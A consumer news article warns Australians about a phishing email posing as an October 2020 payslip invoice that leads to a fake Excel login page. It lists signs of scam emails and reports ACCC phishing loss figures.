'Do not click': New payslip scam steals Aussies’ bank details

Anastasia Santoreneos
·3-min read
A new payslip sam is threatening to steal Aussies' bank details. Source: Getty/MailGuard
A new payslip sam is threatening to steal Aussies' bank details. Source: Getty/MailGuard

Aussies have been warned to double check their payslips for the month of October after MailGuard intercepted a phishing email titled ‘PAYSLIP INVOICE OCTOBER 2020’.

The malicious email is designed to dupe recipients into clicking the “attached secured timesheet and invoice for October” to make sure they get paid.

“Please go through urgently and let me know if all is in order so we can proceed with payment,” the email states.

New payslip scam stealing Aussies' bank details. Source: MailGuard
New payslip scam stealing Aussies' bank details. Source: MailGuard

The link looks like a Microsoft Excel attachment, but those who click the link will be redirected to a Microsoft Excel-branded login page with the background blurred.

“This is a phishing page hosted on Google Cloud, and uses JavaScript’s unescape function to obscure the HTML of the page. It is included most likely an attempt to thwart automated link checking.”

Once users login, the scammers “harvest” their details for later use.

“In such cases, users are reminded of the importance of not accepting/clicking on documents from unknown senders, despite the organisation they purport to be from,” MailGuard stated.

While at first glance, the email looks innocent, there are a few giveaways. For example, the email wasn’t addressed to a particular name, and there were some spelling errors.

I think I’ve received a scam email. What do I do?

If you’re not sure whether the email you have received is a scam or not, here are some telltale signs, according to the MailGuard blog.

  • The email is not addressed to you by name;

  • The email appears to be from a legitimate company, but uses poor English or omits personal details that a legitimate sender would include;

  • The email is from a business you weren’t expecting to hear from, or aren’t a customer of;

  • The email takes you to a landing page or website that isn’t the legitimate URL of the company the email is purporting to be sent from.

$268,440 lost to scams in September

Over the month of September, the ACCC received reports of 5,421 phishing scams, with Aussies losing $268,440 to scams.

Interestingly, those aged between 35 and 44 lost the most money to scams ($87,000) across September - a whopping $20,000 more than those over the age of 65/

“Phishing attacks can appear very trustworthy, and attackers often disguise them as emails from a bank or messages from someone the user knows personally,” malware analyst at Avast, Alexej Savcin said.

“People should be critical of the emails they receive, and if they find anything suspicious, they should never click on any link or download attachments.”

Make your money work with Yahoo Finance’s daily newsletter. Sign up here and stay on top of the latest money, economy, property and work news.

Are you a millennial or Gen Z-er interested in joining a community where you can learn how to take control of your money? Join us at The Broke Millennials Club on Facebook!